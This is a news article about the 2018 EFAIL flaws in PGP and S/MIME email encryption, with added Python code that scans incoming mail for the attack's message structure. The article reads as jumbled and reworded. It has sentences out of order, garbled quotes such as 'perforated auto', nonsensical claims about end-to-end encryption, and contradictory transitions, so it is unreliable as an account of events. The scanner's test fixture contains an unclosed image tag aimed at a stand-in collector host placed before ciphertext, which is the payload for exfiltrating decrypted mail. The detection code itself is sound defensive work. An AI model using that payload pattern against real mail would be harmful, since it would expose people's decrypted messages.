Experts have warned of a danger in encrypted emails

Helen Aguilar
May 14, 2018

The researchers, who are to publish more details on May 15, recommend not using the two encryption tools until they are fixed. Until the flaws are resolved, they recommend that everyone disable any tools that decrypt PGP emails by default.

Matthew Green, a professor of cryptography at Johns Hopkins University in Baltimore, tells Süddeutsche Zeitung that he's reviewed the researchers' work.

In the wake of the new research, Green tells Süddeutsche Zeitung: "This is another bullet hole in an already perforated auto".

More details to come.

Schinzel and his team's research has been corroborated by the Electronic Frontier Foundation (EFF), and has been described in detail by the researchers in a paper published earlier today.

If you've been using PGP or S/MIME to securely send and receive sensitive emails, you'll want to stop using them right away, as a group of European researchers have found vulnerabilities in both standards.

Cybersecurity experts were still assessing the scope of the threat Monday morning, and the EFF called the safety measures a "temporary, conservative stopgap until the immediate risk of the exploit has passed and been mitigated against by the wider community". Their advice for mitigating the vulnerability's impact is to stop encrypting or decrypting emails directly in affected email clients and to disable HTML rendering.

But some think the vulnerability warning is overblown. The EFF has asked service providers to communicate the news to all users and ask them to disable all related security plugins, including Thunderbird with Enigmail, Apple Mail with GPGTools, and Outlook with Gpg4win.

Koch says some MUAs' failure to block hidden HTML links is the problem. According to the researchers behind the discovery, attacks could be executed in one of two ways.

"Don't use HTML mails". That's because EFAIL can be stopped by using authenticated encryption; OpenPGP started to support authenticated encryption in 2001.

End-to-end encryption is used specifically to secure emails that have been compromised in those manners. CounterMail, Hushmail and Mailfence all use OpenPGP.

"In the most straightforward example of our attacks, the adversary prepares a plaintext email structure that contains an img element, whose URL is not closed with quotes", the researchers wrote.

In their paper, researchers noted that "while it is necessary to change the OpenPGP and S/MIME standards to fix these vulnerabilities, some clients had even more severe implementation flaws allowing straightforward exfiltration of the plaintext".
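
The message structure the researchers describe can be checked for on the receiving side. The following Python code is an added example, not code from the researchers' paper or from any mail client: it flags an HTML part that ends inside an unclosed quoted attribute and is directly followed by an encrypted part. The function names, the sample message and the `example.invalid` host are constructed for illustration, and the quote scanner is a heuristic that does not handle HTML comments.

```python
import email
from email import policy

ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/x-pkcs7-mime", "application/pgp-encrypted"}
PGP_ARMOR = b"-----BEGIN PGP MESSAGE-----"

def dangling_quote(html):
    """Return the quote character still open inside a tag at the end of html, else None."""
    in_tag, quote = False, None
    for ch in html:
        if quote:
            quote = None if ch == quote else quote
        elif in_tag:
            if ch in "\"'":
                quote = ch
            elif ch == ">":
                in_tag = False
        elif ch == "<":
            in_tag = True
    return quote

def is_encrypted(part):
    """True for S/MIME or PGP/MIME content types, or a body carrying inline PGP armor."""
    body = part.get_payload(decode=True) or b""
    return part.get_content_type() in ENCRYPTED_TYPES or PGP_ARMOR in body

def scan(raw):
    """Return indexes of HTML leaf parts that end mid-attribute right before an encrypted part."""
    msg = email.message_from_string(raw, policy=policy.default)
    leaves = [p for p in msg.walk() if not p.is_multipart()]
    hits = []
    for i, part in enumerate(leaves[:-1]):
        if part.get_content_type() != "text/html":
            continue
        html = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        if dangling_quote(html) and is_encrypted(leaves[i + 1]):
            hits.append(i)
    return hits

# Constructed sample messages (not real traffic); "AAAA" stands in for ciphertext.
TEMPLATE = (
    'MIME-Version: 1.0\nContent-Type: multipart/mixed; boundary="B"\n\n'
    "--B\nContent-Type: text/html\n\n{html}\n"
    "--B\nContent-Type: application/pkcs7-mime\nContent-Transfer-Encoding: base64\n\nAAAA\n--B--\n"
)
SUSPICIOUS = TEMPLATE.format(html='<img src="http://collector.example.invalid/')
BENIGN = TEMPLATE.format(html='<p>Report attached <img src="cid:logo"></p>')
```

A mail gateway could quarantine any message for which `scan` returns a non-empty list; the same check applies to PGP/MIME and inline-armored messages.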
